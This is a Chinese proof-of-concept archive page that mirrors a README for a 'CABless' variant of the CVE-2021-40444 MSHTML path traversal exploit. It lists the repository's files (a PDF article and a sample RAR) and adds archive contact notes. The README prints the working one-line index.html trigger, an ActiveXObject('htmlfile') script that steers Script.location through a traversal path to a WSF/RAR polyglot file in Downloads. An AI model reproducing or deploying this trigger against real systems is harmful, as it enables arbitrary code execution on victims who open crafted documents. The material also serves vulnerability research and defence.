关联漏洞
标题:Microsoft MSHTML.DLL 路径遍历漏洞 (CVE-2021-40444)Description:Microsoft MSHTML.DLL是美国微软(Microsoft)公司的一个用于解析HTML语言的动态链接库,IE、Outlook、Outlook Express等应用程序都使用了该动态链接库。 Microsoft MSHTML.DLL 存在路径遍历漏洞,远程攻击者可以创建带有恶意ActiveX控件的特制Office文档,诱使受害者打开文档并在系统上执行任意代码。
Description
Modified code so that we don´t need to rely on CAB archives
介绍
# CVE-2021-40444--CABless version
Update: Modified code so that we don´t need to rely on CAB archives
the file "index.html" that triggers payload execution will contain 1 line of code only, inside 'script' tag:
<script>new ActiveXObject('htmlfile').Script.location='.wsf:../../../Downloads/cabless.rar?.wsf';</script>
An article in PDF format is provided.
Update: link to video demo -> https://www.youtube.com/watch?v=V9XD3VboEcU
Note: The sample RAR file does NOT contain a Word document designed to exploit the vulnerability as I have taken as reference one of the PoCs posted on GitHub. Instead, it just have merged WSF and RAR data to demonstrate the path described in the article so the file can be parsed as RAR and WSF (chimera).
文件快照
[4.0K] /data/pocs/69844be2651bbe46b4540da5bbf57bb82a62e9fb
├── [311K] MS_Windows_CVE-2021-40444 - 'Ext2Prot' Vulnerability 'CABless' version.pdf
├── [ 740] README.md
└── [ 199] Sample.rar
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。